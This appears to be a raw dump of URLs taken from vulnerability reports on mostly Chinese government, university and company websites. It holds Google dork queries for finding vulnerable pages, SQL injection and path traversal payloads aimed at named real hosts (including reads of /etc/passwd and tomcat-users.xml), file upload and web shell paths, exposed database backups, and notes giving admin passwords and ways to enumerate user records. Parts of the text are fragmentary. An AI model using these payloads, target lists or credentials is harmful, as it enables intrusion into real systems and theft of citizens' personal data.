http://www.dbs110.gov.cn/wsjb/ http://www.antu.gov.cn/xinfang/ http://www.jyj.changzhi.gov.cn/jzxx/ http://www.yiliang.gov.cn/xf/ http://www.xjgl.gov.cn/xzxx/ http://www.qyx.gov.cn/wsxinfang/ http://www.qjetc.gov.cn/sfwt/ http://www.nbgt.gov.cn/aspx/nbgtxf/ http://www.dbecz.gov.cn/xinfan/ http://www.sidui.gov.cn/xinfang1/ http://www.dxmzj.gov.cn/jzxx/ http://www.cdws.gov.cn/web/mail_book/ http://www.czjqjcy.gov.cn/jzxx/ http://www.lxzjc.gov.cn/jubao/ http://www.yjxzzb.gov.cn/ http://wsj.hcq.gov.cn/webxfasp/ http://www.jsjhcz.gov.cn/czyx/ http://www.dyqxfj.gov.cn/xfsys/ http://www.flqzgzw.gov.cn/xf/ http://www.jxqgb.gov.cn/wangshangxinfang/ http://www.ysland.gov.cn/xinfang/ http://www.lbgkfq.gov.cn/xinfan/ http://www.ggpolice.gov.cn/wyhswysb1/ http://www.qyqga.gov.cn/xinfan/ http://www.njxzzx.org/njxfj/wsxf/ http://wzbtv.com/sfrx/ http://www.lyjr110.cn/ts/ http://www.julu110.cn/xinfang/ http://www.dbecz.gov.cn/xinfan/ http://www.nxky.cn/tsxt/ http://www.lsyhjd.com/xinfan/ http://www.jxqxj.com/xinfan/ http://12366.qzww.com:88/xf/ http://www.hyls.cn/xf/3 http://hlqqzemail.host.aixin114.com/ http://www.jxqgb.gov.cn/wangshangxinfang/ http://bqxmzj.com/xf/ http://60.211.253.196:81/jwxx/ http://oa.glszyz.org/v_tousu/ http://www.pxkss.com/ http://www.cijiedu.com/xzxx/ http://210.30.208.159/sos/ http://222.90.76.146/jjsh/ts/ http://www.zsms.cc/xzmail/ http://www.myesms.net/zf/ http://www.gysy1.com/mail/ http://syesx.syjyw.net/email/ http://www.wzgxzx.com/xzxx/ http://weiquan.jlccsme.com/ http://223.100.112.43/userLoginAction.action http://223.100.112.43/userLoginAction.action inurl:TeachView.asp http://74.125.227.77/search?q=inurl:TeachView.asp&newwindow=1&ei=lwWhU5ylCZCeyAS96oGgBw&start=20&sa=N&biw=1024&bih=615 http://lmk.xhqedu.gov.cn/TeachView.asp?id=20%27 http://www.nczxx.org/TeachView.asp?id=31%27 http://xszy.pdsu.edu.cn/zsx/TeachView.asp?id=59%27 http://www.pjlbsyxx.com/TeachView.asp?id=22%27 http://www.aybfjz.com/TeachView.asp?id=12%27 http://www.scshlx.com/TeachView.asp?id=21%27 http://www.zsguyi.net/TeachView.asp?id=15%27 http://www.nbyale.com/teachview.asp?id=36%27 http://www.pjlbsyxx.com/TeachView.asp?id=26%27 http://www.hzdfxx.com.cn/teachview.asp?id=24%27 http://www.gtxy.cn/xsc/sgzx/TeachView.asp?id=22%27 http://xszy.pdsu.edu.cn/zsx/TeachView.asp?id=5 http://sqlmap.org http://expert.ccidnet.com/ http://www.gzren.com.cn/home/index.asp?action=seach_result http://www.eldshop.cn/data/dbbackup/dw_account_cash_0.sql http://www.eldshop.cn/data/dbbackup/dw_account_cash_1.sql http://sie.cuc.edu.cn/newszhongchua.php?ID=152 http://job.hrbeu.edu.cn/admin1/info/showinfo.asp?infoid=2756 http://58.22.138.34/axis2-admin/ http://58.22.138.34/axis2-admin/manage.htm http://58.42.243.43:8080/login.action http://cms.wangqi.com/ajax.aspx http://www.7stars.net.cn/successful%20case.html inurl:Permission/Application_Query_List.aspx http://hengdong.gov.cn/Permission/Application_Query_List.aspx http://www.leiyang.gov.cn/Permission/Application_Query_List.aspx http://www.hyyfq.gov.cn/Permission/Application_Query_List.aspx http://zx.cq.gov.cn/Permission/Application_Query_List.aspx http://www.hyx.gov.cn/Permission/Application_Query_List.aspx http://www.hnchangning.gov.cn/Permission/Application_Query_List.aspx http://www.hengshan.gov.cn/Permission/Application_Query_List.aspx http://www.zhengxiang.gov.cn/Permission/Application_Query_List.aspx http://59.51.64.36:5544/Permission/Application_Query_List.aspx http://zmhd.yuhua.gov.cn/Permission/Application_Query_List.aspx http://2007.hengshan.gov.cn/Permission/Application_Query_List.aspx http://hengdong.gov.cn/permission/Application_Query_List.aspx?deptName=%E5%9B%BD%E5%9C%9F%E5%B1%80%E7%AA%97%E5%8F%A3&ApplicateCode=123 http://cop.chanjet.com/home/backpwdstep1.jsp http://uop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=admin http://paxy.10010zj.com.cn/ http://paxy.10010zj.com.cn/admin/admin_index.aspx http://xxcj.zafu.edu.cn/Vote/Editor/skins/common/index.asp http://snmxf.zafu.edu.cn/jcc/images/welcome_files/index.asp http://www.hwhr.cn/member/index.php?mpage=person_addresume&show=2&rid=4639 http://www.pldsec.com/index.php/About/content/id/116 http://www.pldsec.com/index.php/About/content/id/116 http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 inurl:DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID= http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FSchoolWeb%2FWeb%2FTeacherSource.aspx%3FKindID%3D http://222.191.250.242/DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1007_1001_1002&sid=310001 http://115.168.45.119/user/user/loginUDB.action http://115.168.45.119/mngr/# http://v1.aili.com/d/click.php?i=MTU4OA== http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml http://union.ceair.com/web/ResetPassWord.aspx?loginuser=99999,代理拦截查看响应包里的__VIEWSTATE,即可轻松查看用户的身份证号、邮箱、手机号等 http://member.aili.com/index.php?m=member&c=member&a=infosub http://member.aili.com/index.php?m=member&c=member&a=subadd main_search:31354759=%7C%7C%7C00 http://www.goto.buct.edu.cn/ainfo.asp?id=320 http://tousu.baidu.com/zhidao/search?word=%B4%BF%B0%D7%CD%F5%B5%C0&pn=1 http://tousu.baidu.com/jubao/search?word=xxxxxxxx http://tousu.baidu.com/zhidao/search?word=%B4%BF%B0%D7%CD%F5%B5%C0 http://tousu.baidu.com/zhidao/search?word=%B4%BF%B0%D7%CD%F5%B5%C0&pn=1 http://www.qioa.cn/ http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7 http://test.oawin.net:8888/Login.aspx http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=9 http://test.oawin.net:8888/seal/20146181714559017339.ASP http://www.bjld.gov.cn/csibiz/indinfo/passwordSetAction!verifyIndUser http://www.ie.cnu.edu.cn/2011/cnuieadmin.php/Content/index# http://www.qioa.cn/ http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7 http://test.oawin.net:8888/Login.aspx http://oa.gdjierong.com:8090/PersonalAffair/worklog_template_show.aspx?id=@@version http://www.kinghighway.com:9000/PersonalAffair/worklog_template_show.aspx?id=@@version http://oa.ruvar.com/PersonalAffair/worklog_template_show.aspx?id=@@version http://oa.mingshiedu.com:801/PersonalAffair/worklog_template_show.aspx?id=@@version http://116.204.107.145:9000/PersonalAffair/worklog_template_show.aspx?id=@@version http://oa.gdjierong.com:8090/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://www.kinghighway.com:9000/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://oa.ruvar.com/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://oa.mingshiedu.com:801/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://116.204.107.145:9000/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://oa.gdjierong.com:8090/WorkPlan/plan_template_preview.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.ruvar.com/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkPlan/plan_template_preview.aspx?template_id=@@version http://116.204.107.145:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.gdjierong.com:8090/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://www.kinghighway.com:9000/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://oa.ruvar.com/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://oa.mingshiedu.com:801/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://116.204.107.145:9000/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://oa.gdjierong.com:8090/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://www.kinghighway.com:9000/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://oa.ruvar.com/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://oa.mingshiedu.com:801/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://116.204.107.145:9000/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://oa.gdjierong.com:8090/WorkFlow/wf_work_print.aspx?idlist=@@version http://www.kinghighway.com:9000/WorkFlow/wf_work_print.aspx?idlist=@@version http://oa.ruvar.com/WorkFlow/wf_work_print.aspx?idlist=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_work_print.aspx?idlist=@@version http://116.204.107.145:9000/WorkFlow/wf_work_print.aspx?idlist=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://oa.ruvar.com/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://116.204.107.145:9000/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://www.kinghighway.com:9000/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://oa.ruvar.com/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://116.204.107.145:9000/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://oa.ruvar.com/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://116.204.107.145:9000/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_office_file_history_show.aspx?id=1 http://www.kinghighway.com:9000/WorkFlow/wf_office_file_history_show.aspx?id=1 http://oa.ruvar.com/WorkFlow/wf_office_file_history_show.aspx?id=1 com:801/WorkFlow/wf_office_file_history_show.aspx?id=1 http://www.primeton.com/read.php?id=1802&his=1 http://www.qiaohu.com/news/index_ny.php?id=27957 http://shop.qiaohu.com/statistic/hou_tj_nowdaycountdaily.php http://edu.china-sss.com/ http://202.197.190.6:8016/ http://www.peiluyou.com:9999/offlinelogin?_act_=offLineLogin&pdtid=3&routerId=xxxxxx&uid=null http://edu.china-sss.com:100/ http://www.dxalxzfwzx.gov.cn/home/do_download.jsp?url=../../conf/tomcat-users.xml http://www.dxalxzfwzx.gov.cn/home/do_download.jsp?url=/home/do_download.jsp http://hezuo.sh.189.cn/Upload.aspx http://hezuo.sh.189.cn/Users/test.txt,经验证,此处上传没有文件类型限制。 http://hezuo.sh.189.cn/Users/adminadmin/test.jpg http://demo.cnnitc.com/inquiry.php http://demo.cnnitc.com/inquiry.php http://www.beyo.com.cn/beyo/uploads/,发现网站存在目录遍历漏洞,并存在有sql敏感文件; http://www.beyo.com.cn/admin/输入管理员的账户和密码可登录应用后台并编辑网站内容。 http://www.zk-jxt.com/ajax/getschoolcard.ashx?id=1 http://wooyun.org/bugs/wooyun-2014-059109) http://jwgl.hunnu.edu.cn http://www1.openedu.com.cn/ycjy/fengmian_new.php?id=447&mid=132&dbname=fengmain http://xiaoxi.yonyou.com/browser/ http://xiaoxi.yonyou.com/jmx-console进入。 URL:http://udp.ufida.com.cn/uDetail-p1.asp?flag=rjcp&seq_no=183【注入点】 http://udp.ufida.com.cn/utilityList.asp?mkname=KCGL&ud=20 http://udp.ufida.com.cn/plus_select.asp?flag=aa&udp_id=lxooo http://udp.ufida.com.cn/select_developerReg.asp?uid=uffans http://udp.ufida.com.cn/demoright.asp?page=2&uid=zyerp&company_name=%B1%B1%BE%A9%D7%F0%D3%D1%C8%ED%BC%FE%D3%D0%CF%DE%B9%AB%CB%BE inurl:asp?flag= inurl:seq_no= http://www.adsky.co.kr/qna_view.asp?seq_no=5219%27&pagenum=1333&srchN=&srchT=&srchC=&sval= http://www.redflagclub.com.hk/main06_a_as.asp?seq_no=184%27&desc=%EF%BF%BD%EC%B9%A2%EF%BF%BD%EF%BF%BD%EF%BF%BDu%EF%BF%BD%EF%BF%BDA%EF%BF%BD%7B%27 http://udp.ufida.com.cn/uDetail-p1.asp?flag=rjcp&seq_no=187 http://www.bioinfo.tsinghua.edu.cn/ http://www.bioinfo.tsinghua.edu.cn/wp-login.php http://jwjcc.bfsu.edu.cn/ http://jwjcc.bfsu.edu.cn/wp-login.php http://edu.china-sss.com/search.vip http://cloud.broadlink.com.cn/ip_sensor/index.php/home/get_forget http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 inurl:DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID= http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FWorkRoomWeb%2FWeb%2FIndex.aspx%3FTID%3D http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1000210106 http://club.1hai.cn/consult_detail.aspx?id=2 http://club.1hai.cn/consult_detail.aspx?id=2%27%20and%201=1%20and%20union%20select%201,2,3,4,5,6-- http://202.117.3.105:9000/LoginAction/loginLAction.action http://mba.cau.edu.cn/investday.php?id=1237 http://mba.cau.edu.cn/phpinfo.php http://xgb.lzu.edu.cn/WebSite/Web/NoticeInfo.aspx?Id=1321 view-source:http://www.zhanqi.tv/11305 www.zhanqi.tv","RecUrl":"http:\/\/vod.cdn.zhanqi.tv\/hls\/review\/UvDAFT08wb\/playlist.m3u8"},"follows":167,"onlines":6317,"notice":"\u6700\u6fc0\u70c8\u7684\u601d\u60f3\u98ce\u66b4 rtmp://fhlive.78diy.com/fhlive http://www.wodreamworks.com/index.php http://fmg.2014.sohu.com/ http://fmg.2014.sohu.com/webadmin http://www.sast.org.cn/admin/login.php http://www.sast.org.cn/index.php?part_id=128&category=2 http://www.otxx.net/Login.aspx?APPSecret= http://threeoa1.dhu.cc/us/user/get_password.jsp http://wifi.huazhu.com:8005/zh/home/index?ip=192.168.66.94&mac=28:18:78:cf:40:b9&ncip=192.168.50.200&ncport=80&siteid=50010621000514&sitename= http://wifi.huazhu.com:8005/zh/Finish/Success/18821268198/2002311/31011221020021/60:45:bd:e1:53:dc/login http://www.phpshe.com http://127.0.0.1:8081/router.cfg?Submit=%E4%BF%9D%E5%AD%98%E9%85%8D%E7%BD%AE http://112.93.35.124:8081/router.cfg?Submit=%E4%BF%9D%E5%AD%98%E9%85%8D%E7%BD%AE http://www.njjg.gov.cn:81/ http://127.0.0.1:8081/tmp/router_conf.tgz http://112.93.203.217:8081/tmp/router_conf.tgz db.zju.edu.cn/s/test/download.php?id=1 http://db.zju.edu.cn/s/forums/ http://oa http://oa http://www.peiluyou.com:9999/setconnectionsettings?_act_=setConnectionSettings&pdtid=3 http://www.peiluyou.com:9999/getconnectionsettings?_act_=getConnectionSettings http://www.bit-service.com/index.html inurl:xmlpzs http://www.x***.gov.cn/ http://www.b***dc.com.cn/ http://www.k***dc.cn/ http://www.l***g.com.cn/ http://www.***gj.cn/ http://www.pde.ecnu.edu.cn/admin/login.aspx http://www.tjredcross.org/zdbd.asp?id=1219 http://bbs.hintsoft.com.cn/bbs/admin.php www.ecs.cn http://wooyun.org/bugs/wooyun-2014-065656 http://www.shnotary.gov.cn/ http://www.shnotary.gov.cn/notarial/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/../ http://www.shnotary.gov.cn/notarial/UserFiles/ http://www.shnotary.gov.cn/platformData/ http://zhaosheng.xaufe.edu.cn/zhaosheng/show.asp?id=181 http://218.26.4.169:6286/aicberm/loginAction!login.action http://wap.kuwo.cn/wap/wap/Model?id=77&qq-pf-to=pcqq.group http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_open_box?callback=jsoncallback http://xsc.jlu.edu.cn/ http://xsc.jlu.edu.cn/wp-login.php,用户名和密码都是yjzx,管理权限。解决方法是强壮口令就可以了,比如密码设置为数字和字母混合。 http://www.zdvictory.com/ http://www.zdvictory.com/a/chanpinzhongxin/chenggonganli/list_10_1.html inurl:/website/dflz/ http://dflz.shanwei.gov.cn/website/dflz/dflzSiteAction.action http://dflz.meizhou.gov.cn/website/dflz/dflzSiteAction.action http://dflz.maoming.gov.cn/website/dflz/dflzSiteAction.action http://www.cwgk.gz.gov.cn/website/dflz/dflzSiteAction.action http://219.129.166.87/website/dflz/dflzSiteAction.action http://dflz.zhaoqing.gov.cn/website/dflz/dflzCjAction.action?orgCode=4412230112&orgName=%D3%C0%C7%E0%B4%E5 http://ygnl.szdflz.gov.cn/website/dflz/dflzXianjAction.action?orgCode=140601&orgName=%CB%B7%B3%C7%C7%F8 http://dflz.sg.gov.cn/website/dflz/dflzCjAction.action?orgCode=4402040101&orgName=%B2%E8%C9%BD%BE%D3%C3%F1%C7%F8 http://119.145.255.2:8081/common/jsp/file.jsp http://202.104.136.25 http://202.104.136.25/common/jsp/file.jsp inurl:MoralsView.asp http://www.zsguyi.net/MoralsView.asp?id=10%27 http://lmk.xhqedu.gov.cn/MoralsView.asp?id=17%27 http://sy.xhqedu.gov.cn/MoralsView.asp?id=38%27 http://www.zhongke666.com/MoralsView.asp?id=25%27 http://www.gtxy.cn/xsc/sgzx/MoralsView.asp?id=22%27 http://hlyx.ez.e21.cn/MoralsView.asp?id=19%27 http://www.hcjszx.com/MoralsView.asp?id=29%27 http://www.gfkqzx.com/MoralsView.asp?id=24%27 http://www.zcvc.cn/dgb/MoralsView.asp?id=23%27 http://50jy.com/MoralsView.asp?id=44%27 http://www.ztrdzx.com/MoralsView.asp?id=9%27 http://jx.jxyjxy.net/MoralsView.asp?id=15%27 http://www.hsjyzx.com/school1/MoralsView.asp?id=14%27 http://www.aflc.com.cn/xfjs/MoralsView.asp?id=19%27 http://www.linxisz.com/MoralsView.asp?id=62%27 http://222.24.19.31/织梦系统,sql注入加遍历目录,这里就不说了,漏洞已经帮你修复了,我就只截个图作为证明 http://zcgs.xupt.edu.cn/mtce/ http://jyc.xiyou.edu.cn/ http://lib.xupt.edu.cn/announce/article.asp?id=160 http://lib.xupt.edu.cn/xysh/bbs/login.asp http://tg.xiyou.edu.cn和http://222.24.19.104存在注入漏洞 http://etc.jlu.edu.cn/wordpress/ http://etc.jlu.edu.cn/wordpress/wp-login.php,用户名和密码都是admin,管理权限,解决方法是强壮口令就可以了,比如密码设置为数字和字母混合。 http://www.ixingmei.com/.svn/entries http://www.qioa.cn/) http://www.ttyoa.com/OA/XiaoShou/XiaoShouLeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=ad&ShuoMing= http://www.ttyoa.com/OA/XiaoShou/GenZongJiLu/HDJL.jsp?Type_Id=1&nCurPage=1&HDSJ2=2014-06- http://www.ttyoa.com/OA/XiaoShou/DuiXiangXinXi/KFXX.jsp?Type_Id=1&nCurPage=1&KFMC=asd&OrderBy=ShengRi&QuanXian=true http://www.ttyoa.com/OA/KaoQin/LeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=sada&ShuoMing= http://www.ttyoa.com/OA/KaoQin/KaoQinMingXi/main.jsp?nCurPage=1&OrderBy=RiQi&Nian=2014&Yue=06&KaoQing_KS=2014-05- http://www.ttyoa.com/OA/XiaoShou/XiaoShouLeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=ad&ShuoMing= http://www.ttyoa.com/OA/XiaoShou/GenZongJiLu/HDJL.jsp?Type_Id=1&nCurPage=1&HDSJ2=2014-06- http://www.ttyoa.com/OA/XiaoShou/DuiXiangXinXi/KFXX.jsp?Type_Id=1&nCurPage=1&KFMC=asd&OrderBy=ShengRi&QuanXian=true http://www.ttyoa.com/OA/KaoQin/LeiXing/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=sada&ShuoMing= http://www.ttyoa.com/OA/KaoQin/KaoQinMingXi/main.jsp?nCurPage=1&OrderBy=RiQi&Nian=2014&Yue=06&KaoQing_KS=2014-05- inurl:user.php?act=get_password&uid= http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0 http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0 http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4 http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85 http://www.cngrain.org/read.php?id=732 http://60.247.21.66:8085/ http://www.xingmeng.com/recruit/anchor http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp13982364133&order_by=12 http://219.148.63.54:8080/jsp/main.jsp http://www.jvw.gov.cn url:http://bbs.teamcen.com/index.php?ac=index_info&bid=8&m=bbs&id=48#reply http://www.ttyoa.com/OA/Bank/KaiHu/MainFrame.jsp http://www.ttyoa.com/OA/CaiWuGuanLi/XiangMuGuanLi/MainFrame.jsp http://www.ttyoa.com/OA/CaiWuGuanLi/YuJiCaiWuShouRu/CWSR.jsp http://www.ttyoa.com/OA/ShuiWuGuanLi/FaPiaoGouMai/CWSR.jsp http://www.ttyoa.com/OA/ShuiWuGuanLi/FaPiaoKaiJu/CWSR.jsp?Type_Id=1&nCurPage=1&XM_ID=&FuKuanDanWei=&YJKS1=2014-01- http://demo.taou.com http://demo.taou.com/xhb http://www.mimi.ai/ios/ios_internal.plist http://demo.taou.com/web/dialogs http://www.zjgjzy.gov.cn/zjg_aqsgba/zjg_aqsgba/pages/login.aspx?URL=Index2.aspx http://mp.weixin.qq.com/mpres/htmledition/res/wx_sample.zip https://code.google.com/p/svnmaia/,通杀所有版本。 http://demo1.515158.com/login.php http://oa.515158.com/index.php http://t4.m1905.com/(变形金刚4官网) http://passport.youku.com/user/loginReturn?callback=alert%28/wooyun/%29 http://mail.aodacn.com/nmc/cgi/index.cgi登陆后台 http://mail.aodacn.com/nmc/cgi/ann.cgi?__mode=edit_ann&sid=gcipW8QUgtZsKVRpHWPKcFtjadministrator-aodacn_com&ann_id=47&screen=edit_ann.html http://xwb.sdpec.edu.cn/sdadgei/display.php?id=503 http://deoa.sany.com.cn/names.nsf/$users http://deoa.sany.com.cn/names.nsf/defaultview http://game.coolpad.com/gameWeb/search_YxSearchAction.do http://game.coolpad.com/gameWeb/shell.jsp http://vod.qq.com/ http://221.233.24.55/login.jsp http://221.233.24.55/common/shell/ http://221.233.24.55/common/shell/BillBack.sh http://app.navi.baidu.com/peccancy/search?citys=SX_XA&rn=100&source=1®istno&engineno&pk_id=719684&carno=车牌号&pn=0&classno=车架号&type=2 http://www.quantian.com/WEB-INF/web.xml http://www.kmdc.gov.cn:80/dep/gzbm_aqscjdklj/list.ashx?id=1 http://www.kmdc.gov.cn:80/gov/list.ashx?id=1 http://www.kmdc.gov.cn:80/dep/bmgl_qrmjcy/list.ashx?id=1 http://www.kmdc.gov.cn:80/dep/gzbm_jtj/list.ashx?id=1 http://www.kmdc.gov.cn/dep/gzbm_aqscjdklj/show.ashx?id=82874 http://dc.km.gov.cn/dep/gzbm_aqscjdklj/list.ashx?id=20981&typeId=0&page=34 http://www.kuaida.net/ http://www.kuaida.net/vip/View.aspx?id=6XXXX就可以遍历了,其中id后面的数据我是根据主页上的“最新订单”构造的,经测试,id取61000-63716之间的都可以成功遍历,不知道是不是还有别的构造id数值的方法来遍历更多的用户信息~~ http://www.gatzs.com.cn//gatyz/fjms/layouts/utf8Layout.jsp?location=../../WEB-INF/web.xml%3f%2500.jpg http://manager.99114.com/ http://jiankang.baidu.com/ http://demo.oa8000.com/为例, user:123456 http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa/wa/TraceOpenPage http://enjoyty.bjtelecom.net/user/initLogin.do http://3g.bj.ct10000.com/news/showNews.do http://demo.oa8000.com/为例, user:123456 http://demo.oa8000.com/OAapp/bfapp//buffalo/oaPubptUploadService inurl:homepage/common/ http://eol.yzu.edu.cn/eol/homepage/common/opencourse/scriptsearch.jsp?folderid=0&lid=31792&_style=page1 http://eol.aku.edu.cn/eol/homepage/common/opencourse/scriptsearch.jsp?folderid=0&_style=aktc&lid=11918 http://wlkc.njust.edu.cn/eolenv/homepage/common/opencourse/scriptsearch.jsp?folderid=0&_style=nust&lid=1149 http://teach.hnnu.edu.cn/homepage/common/opencourse/scriptsearch.jsp?folderid=0&_style=hnnu&lid=11633 http://eol.yzu.edu.cn:80/ http://www.kdmchina.org/downHelpServlet?fileName=../../../../../../../../../../etc/passwd http://ku.7k7k.com/index.php?type=1&page=1 http://115.182.59.75 inurl:news_show.php inurl:art_id http://www.ahduji.gov.cn:80/news_show.php http://action-collect.coolyun.com http://action-collect.coolyun.com/logs/ http://action-collect.coolyun.com/webpage/hotnews.html http://action-collect.coolyun.com/myadmin/ inurl:cms/template/InfoShowDefault.jsp http://www.wooyun.org/bugs/wooyun-2014-065701/trace/21f36bd00affa3de5b0f652798b59edc/code http://mall.juneyaoair.com/member/checkOrderInfo.jspx?receiverInfoId=11470&receiver=&province=&city=&hometown=&detailAddress=&tel=&shipmentDate=%E5%B7%A5%E4%BD%9C%E6%97%A5%E6%88%96%E5%8F%8C%E4%BC%91%E6%97%A5%E5%85%A8%E5%A4%A9%E5%80%99%E9%85%8D%E9%80%81&remark= http://” https://"。从效果上来看,这种方法到现在还是非常凑效的。 http://cksource.com/ckfinder/demo http://www.nths.cn/webschool/News/news_list.jsp?siteId=0&typeId=news61 http://try.lenosoft.net/bsdepot/为例, http://try.lenosoft.net/bsdepot/public/del_backup.asp?filename=../../bsdepot/images/login_01.jpg http://try.lenosoft.net/bsdepot/images/login_01.jpg http://wooyun.org/bugs/wooyun-2010-065537!毕竟我这个本身是防注入的。。好了 http://74.125.227.77/#newwindow=1&q=+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E9%91%AB%E5%8D%93%E7%BD%91%E7%BB%9C http://www.chriscn.com/Product.asp?BigClassName=%BD%C7%B7%A7%CF%B5%C1%D0 http://www.hzoccc.com/Product.asp?BigClassName=%B0%E1%D4%CB%B3%B5%CF%B5%C1%D0 http://fdafetreqwe.gotoip55.com/Product.asp?BigClassName=%C6%FB%B3%B5%EE%D3%BD%F0%CF%B5%C1%D0 http://www.cxaide.com/Product.asp?BigClassName=%C8%A1%C5%AF%C6%F7%CF%B5%C1%D0 http://www.blpack.com/Product.asp?BigClassName=%C6%FB%B3%B5%EE%D3%BD%F0%CF%B5%C1%D0 http://www.ygstw.com/Product.asp?BigClassName=%B7%C0%B7%E7%B7%C0%BA%AE%B9%A4%D7%F7%B7%FE http://www.nbrrd.com/Product.asp?BigClassName=%C6%FB%B3%B5%EE%D3%BD%F0%CF%B5%C1%D0 http://e.meituan.com/ http://www.chaohu.gov.cn/template/search.aspx?seachKey= http://www.chaohu.gov.cn/template/gov_leader_list.aspx http://www.hdx.gov.cn/hdzf/newsinfo.aspx?id=44041 http://wmw.henu.edu.cn/wp-login.php,用户名和密码都是wmwadmin,管理权限。漏洞修复:强壮一下用户密码就可以了,比如字母与数字混合,问题不大。 http://itest.yoka.com/ques.php?id=2087加'直接跳转回前台。。然后我利用了sqlmap进行get注入试了下! http://itest.yoka.com/ques.php?id=2087 http://sqlmap.org http://189.cn/dqmh/userCenter/bmhelp.do?method=pUK&phonenumber=手机号 inurl:NewsView.asp http://74.125.227.77/search?q=inurl:NewsView.asp&newwindow=1&ei=eoyiU5zSOOfQ8AGzwIHoBw&start=110&sa=N&biw=1366&bih=615 http://www.mhwmm.com/Ch/NewsView.asp?ID=4684 http://www.mhwmm.com/Ch/NewsView.asp?ID=4684 http://sqlmap.org http://m.lashou.com/dobuy2.php?id=8284503&fr=0&city=shanghai&vt=3 http://loan.xszz.gov.cn/2014/ 